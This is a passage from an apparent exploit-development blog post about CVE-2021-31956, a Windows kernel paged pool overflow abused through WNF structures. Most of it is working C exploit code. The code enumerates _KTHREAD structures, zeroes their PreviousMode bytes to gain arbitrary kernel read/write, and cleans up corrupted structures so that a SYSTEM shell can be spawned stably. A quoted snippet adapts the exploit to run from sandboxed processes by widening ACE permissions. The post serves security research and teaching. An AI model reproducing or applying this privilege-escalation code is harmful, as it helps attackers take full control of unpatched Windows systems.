    kthreads[0] = (UINT64)kthread_blink - (UINT64)0x2f8;
    if ((UINT64)kthreads[0] < 0xFFFF800000000000) {
        log_warn("Fail to find _KTHREAD in memory");
        goto out;
    }

    printf("[+] Found _KTHREAD 1 at %p\n", kthreads[0]);

A few points in the code above need explaining.

Firstly, we XOR the leaked statename with the statename constant 0x41C64E6DA3BC0074, because the statename returned to usermode is not the same value as the one stored in kernel memory.
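Since XOR is its own inverse, the same operation converts in both directions. A tiny sketch with hypothetical helper names, treating the statename as a plain 64-bit integer:

```c
#include <assert.h>
#include <stdint.h>

#define STATENAME_CONST 0x41C64E6DA3BC0074ull

/* Value found in kernel memory -> value the usermode APIs expect. */
static uint64_t statename_external_from_internal(uint64_t internal)
{
    return internal ^ STATENAME_CONST;
}

/* Value handed to usermode -> value stored in the name instance. */
static uint64_t statename_internal_from_external(uint64_t external)
{
    return external ^ STATENAME_CONST;
}
```

Applying one conversion after the other always gives back the original value.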

Then we point the StateData at the ThreadListHead member and attempt a query.

This query will fail, because we don’t have sane size fields near there. Even if we did, we would not know how large a buffer to pass, because the read only succeeds when our buffer is at least as large as the DataSize member.

However, recall from the WNF section above, the ChangeStamp and BufferSize fields are actually populated with values at that memory location.

In this case, they will form the Blink value.
(Fun fact, I made a mistake by naming them flink in my actual exploit lmao.)
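To see why the two 32-bit outputs form the Blink, picture the fake _WNF_STATE_DATA laid over the LIST_ENTRY: DataSize at +0x8 covers the low half of Blink and ChangeStamp at +0xC covers the high half. The sketch below replays that on a local struct. It assumes a little-endian machine, and list_entry_model, combine_halves and leak_blink are names I made up.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

/* Same layout as a 64-bit LIST_ENTRY. */
struct list_entry_model {
    uint64_t Flink; /* offset 0x0 */
    uint64_t Blink; /* offset 0x8 */
};

/* Rebuilds a 64-bit value from the two 32-bit fields a query returns. */
static uint64_t combine_halves(uint32_t change_stamp, uint32_t buffer_size)
{
    return ((uint64_t)change_stamp << 32) | buffer_size;
}

/* Reads the two dwords the way the query would if StateData pointed at
 * head: DataSize from +0x8 and ChangeStamp from +0xC. */
static uint64_t leak_blink(const struct list_entry_model *head)
{
    uint32_t data_size, change_stamp;

    assert(head != NULL);
    memcpy(&data_size, (const uint8_t *)head + 0x8, sizeof data_size);
    memcpy(&change_stamp, (const uint8_t *)head + 0xC, sizeof change_stamp);
    return combine_halves(change_stamp, data_size);
}
```

The first 8 bytes (Flink) are never returned, because they line up with the Header and AllocatedSize fields, which the query does not hand back.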

You may ask how I found my own _KPROCESS address in the first place.

I used a well-known trick with the NtQuerySystemInformation API (also used in my Exploiting Inherited Handles blog) to leak the kernel addresses of handles.

However, we can also read the CreatorProcess field of the _WNF_NAME_INSTANCE to leak the _KPROCESS of our current process, in case the API gets patched in future releases.

From here, we can traverse the list and enumerate all _KTHREADs.

for (int i = 1; i < MAX_THREAD_SEARCH; i++) {
        arbwrite_name->StateData = kthread_blink; // find previous kthread

        if (!NT_SUCCESS(write_pool(statenames, overflow_idx, write_data, fix_size)))
            goto out;

        ext_statename = *(PULONGLONG)&(arbwrite_name->StateName) ^ STATENAME_CONST;

        _NtQueryWnfStateData((WNF_STATE_NAME *)&ext_statename, NULL, NULL, &stamp, write_data, &write_data_sz); // this call will fail, so we don't error check

        kthread_blink = (UINT64)stamp << 32 | (UINT32)write_data_sz;
        if ((UINT64)kthread_blink == (UINT64)threadlisthead)
            break; // break if there are no more unique entries

        write_data_sz = 0x5000;
        memcpy(write_data, read_data, 0x5000);

        kthreads[i] = (UINT64)kthread_blink - (UINT64)0x2f8;
        if ((UINT64)kthreads[i] < 0xFFFF800000000000) {
            log_warn("Fail to find _KTHREAD in memory");
            goto out;
        }

        printf("[+] Found _KTHREAD %d at %p\n", i+1, kthreads[i]);
    }

Once we find all the threads, we can perform the PreviousMode Attack on all of them.

PreviousMode Attack

PreviousMode is a one byte member of the _KTHREAD structure.

It’s consulted when kernel APIs (those implemented in ntoskrnl.exe that share a name with user APIs in ntdll.dll) validate their arguments.

UserMode has a value of 1, and KernelMode has a value of 0.

When an API request is serviced, security checks will be invoked based on the PreviousMode.

For example, memory boundary checking is enforced if PreviousMode is set to 1 for the NtReadVirtualMemory API to make sure usermode threads cannot read kernel data.

However if PreviousMode is set to 0, the system will gladly skip all checks and assume you are running as a kernel driver.
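As a mental model only, the check can be pictured like the function below. This is not the kernel’s code: the probe limit is my assumption of a typical x64 value, the MODEL_ names are invented, and real APIs perform more checks than an address range test.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

enum { MODEL_KERNEL_MODE = 0, MODEL_USER_MODE = 1 };

/* Assumption: typical upper bound for user addresses on x64. */
#define MODEL_USER_PROBE_LIMIT 0x00007FFFFFFF0000ull

/* Conceptual model of a PreviousMode-gated address check. */
static bool model_access_allowed(uint64_t addr, uint64_t len, int previous_mode)
{
    assert(previous_mode == MODEL_KERNEL_MODE || previous_mode == MODEL_USER_MODE);

    if (previous_mode == MODEL_KERNEL_MODE)
        return true;                  /* caller is trusted, checks skipped */

    if (addr + len < addr)
        return false;                 /* range wraps around */
    return addr + len <= MODEL_USER_PROBE_LIMIT; /* must stay in user space */
}
```

The same kernel address is rejected when the request appears to come from user mode and accepted when it appears to come from kernel mode, which is the whole point of the attack.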

This is great news for us as exploit writers.

By nulling out the PreviousMode byte, we get real, hassle-free arbitrary read/write using ordinary Windows APIs.

for (int i = 0; i < MAX_THREAD_SEARCH; i++) {
        if (kthreads[i] == 0)
            break;

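        // Fake header overlaps kthread.Process (+0x220); data begins at +0x230,
        // so the third byte written lands on PreviousMode (+0x232).
        arbwrite_name->StateData = (UINT64)kthreads[i] + 0x220;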

        if (!NT_SUCCESS(write_pool(statenames, overflow_idx, write_data, fix_size)))
            goto out;

        write_data_sz = 0x5000;
        memcpy(write_data, read_data, 0x5000);

        ext_statename = *(PULONGLONG)&(arbwrite_name->StateName) ^ STATENAME_CONST;
        if (!NT_SUCCESS(_NtUpdateWnfStateData((WNF_STATE_NAME *)&ext_statename, prev_mode, 0x3, NULL, NULL, 0, 0))) {
            log_warn("main::_NtUpdateWnfStateData()1");
            goto out;
        }

        printf("[+] Overwritten PreviousMode of _KTHREAD %d to 0\n", i+1);
    }

Clean Up

Stealing the token and spawning a shell is pretty straightforward, so I’ll skip to cleanup.

There are a few things we have to clean up.

While trying to overflow statedata chunks, we might have set the RunRef member of a nameinstance chunk to an invalid value.

This can lead to a crash when the system uses this field.

Since it’s a reference counter, we can fix it by setting it to 0.

We can find all our nameinstance blocks by accessing the WnfContext field of our _EPROCESS and traversing the linked list.

NTSTATUS fix_runrefs(_In_ PWNF_PROCESS_CONTEXT ctx)
{
    NTSTATUS            status = STATUS_SUCCESS;
    PLIST_ENTRY         head = (PLIST_ENTRY)read64(&(ctx->TemporaryNamesListHead));
    PLIST_ENTRY         next = read64(head);
    PWNF_NAME_INSTANCE  cur = CONTAINING_RECORD(next, WNF_NAME_INSTANCE, TemporaryNameListEntry);

    for (; next != head; next = read64(next), cur = CONTAINING_RECORD(next, WNF_NAME_INSTANCE, TemporaryNameListEntry))
        if ((UINT64)read64(&(cur->Header)) != (UINT64)0x0000000000A80903) {
            write64(&(cur->Header), (UINT64)0x0000000000A80903);
            write64(&(cur->RunRef), (UINT64)0x0000000000000000);
        }

    puts("[+] Fixed all overwritten header and runrefs");

    return status;
}

Next, we’ll have to set the PreviousMode of all _KTHREADs back to 1, because we did not record which ones were set to 1 before.

Even if we set an actual kernel thread’s PreviousMode to 1, it should still be fine, because kernel code is supposed to call the Zw versions of these functions, which bypass the checks anyway.

Finally, we have to patch the StateData pointer of our corrupted nameinstance chunk.

if (!NT_SUCCESS(fix_runrefs(ctx)))
        goto out;

    for (int i = 0; i < MAX_THREAD_SEARCH; i++) {
        if (kthreads[i] == 0)
            break;

        arbwrite_name->StateData = (UINT64)kthreads[i] + 0x220; // kthread.Process

        if (!NT_SUCCESS(write_pool(statenames, overflow_idx, write_data, fix_size)))
            goto out;

        write_data_sz = 0x5000;
        memcpy(write_data, read_data, 0x5000);

        ext_statename = *(PULONGLONG)&(arbwrite_name->StateName) ^ STATENAME_CONST;
        if (!NT_SUCCESS(_NtUpdateWnfStateData((WNF_STATE_NAME *)&ext_statename, old_prev_mode, 0x3, NULL, NULL, 0, 0))) {
            log_warn("main::_NtUpdateWnfStateData()1");
            goto out;
        }

        printf("[+] Restored PreviousMode of _KTHREAD %d to 1\n", i + 1);
    }

    if (!NT_SUCCESS(write_pool(statenames, overflow_idx, read_data, fix_size)))
        goto out;

And now we can happily spawn a SYSTEM shell with the system still stable, unless the heap spray failed and we accidentally overwrote a data structure other than the WNF structures.

Conclusion

You can find my full exploit here:
https://github.com/Y3A/CVE-2021-31956

Abusing WNF structures was new to me, but I’m impressed by its flexible read/write capabilities.

Furthermore, it’s a paged pool gadget, which is quite rare (normally you hear about people exploiting non-paged pools more).

I’m pretty convinced that kernel exploitation is mostly about “who has more super secret undocumented gadgets of varying sizes to use in both pools”.

Without standing on the shoulders of the references listed below, there’s no way I could have figured all of this out in a reasonable amount of time.

All respects to vuln/system researchers!

Update

A reader reported being unable to call the WNF APIs from a low-privilege context (e.g. the Chrome sandbox).
My exploit here does not take that into consideration, but as mentioned by @k0shl in a tweet, it’s absolutely possible to launch the exploit from a sandbox.

Ad verbum:

Well, this depends on the SecurityDescriptor parameter of NtCreateWnfStateName and NtUpdateWnfStateData, in the sandboxed situation, you should invoke NtQuerySecurityObject from process token and get a SD which can be accessed by sandboxed process, and pass it to WNF API

His code to achieve this:

BOOLEAN AllocateWnfObject(DWORD dwWantedSize, PWNF_STATE_NAME pStateName) {
    NTSTATUS Status;
    HANDLE gProcessToken;
    WNF_TYPE_ID TypeID = { 0 };
    PSECURITY_DESCRIPTOR SecurityDescriptor;
    ULONG RetLength = 0;
    BOOL DaclPresent, SaclPresent;
    BOOL DaclDefault, SaclDefault, OwnerDefault, GroupDefault;
    PACL pDacl, pSacl;
    PSID pOwner, pGroup;
    ACE_HEADER* AceHeader;
    ACCESS_ALLOWED_ACE* pACE;
    PSECURITY_DESCRIPTOR GetSD;
    
    Status = fNtOpenProcessToken(GetCurrentProcess(), MAXIMUM_ALLOWED, &gProcessToken);
    if (Status < 0) {
        return FALSE;
    }
    
    SecurityDescriptor = (PSECURITY_DESCRIPTOR)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, 0x1000); // initialize a new SD

    GetSD = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, 0x1000);

    Status = fNtQuerySecurityObject(
        gProcessToken,
        OWNER_SECURITY_INFORMATION | GROUP_SECURITY_INFORMATION | DACL_SECURITY_INFORMATION | LABEL_SECURITY_INFORMATION,
        GetSD,
        0x1000,
        &RetLength); // Query a accessible SD from process token

    if (Status < 0)
    {
        return FALSE;
    }

    // Get Owner/Group/DACL/SACL from accessible security object
    GetSecurityDescriptorOwner(GetSD, &pOwner, &OwnerDefault);
    GetSecurityDescriptorGroup(GetSD, &pGroup, &GroupDefault);
    GetSecurityDescriptorDacl(GetSD, &DaclPresent, &pDacl, &DaclDefault);
    GetSecurityDescriptorSacl(GetSD, &SaclPresent, &pSacl, &SaclDefault);

    AceHeader = (ACE_HEADER*)&pDacl[1];
    while ((DWORD)AceHeader < (DWORD)pDacl + (DWORD)pDacl->AclSize)
    {
        if (AceHeader->AceType == ACCESS_ALLOWED_ACE_TYPE)
        {
            pACE = (ACCESS_ALLOWED_ACE*)&AceHeader[0];
            pACE->Mask = GENERIC_ALL;
        }
        AceHeader = (ACE_HEADER*)((DWORD)AceHeader + (DWORD)AceHeader->AceSize);
    }

   // Set it to new SD
    InitializeSecurityDescriptor(SecurityDescriptor, SECURITY_DESCRIPTOR_REVISION);
    SetSecurityDescriptorOwner(SecurityDescriptor, pOwner, OwnerDefault);
    SetSecurityDescriptorGroup(SecurityDescriptor, pGroup, GroupDefault);
    SetSecurityDescriptorDacl(SecurityDescriptor, DaclPresent, pDacl, DaclDefault);
    SetSecurityDescriptorSacl(SecurityDescriptor, SaclPresent, pSacl, SaclDefault);

    HeapFree(GetProcessHeap(), HEAP_ZERO_MEMORY, GetSD);

    Status = fNtCreateWnfStateName(
        pStateName,
        WnfTemporaryStateName,      
        WnfDataScopeSession,    
        FALSE,
        &TypeID,
        0x1000,
        SecurityDescriptor);  // invoke WNF API with new SD

    if (Status < 0)
    {
        return FALSE;
    }

    PVOID lpBuff = (PVOID)malloc(dwWantedSize - 0x20);
    memset(lpBuff, 0x00, dwWantedSize - 0x20);

    Status = fNtUpdateWnfStateData(
        pStateName,
        lpBuff,
        dwWantedSize - 0x20,
        &TypeID,
        NULL,
        0,
        0);

    if (Status < 0)
    {
        return FALSE;
    }
    free(lpBuff);
    return TRUE;
}

References

https://research.nccgroup.com/2021/07/15/cve-2021-31956-exploiting-the-windows-kernel-ntfs-with-wnf-part-1/

https://research.nccgroup.com/2021/08/17/cve-2021-31956-exploiting-the-windows-kernel-ntfs-with-wnf-part-2/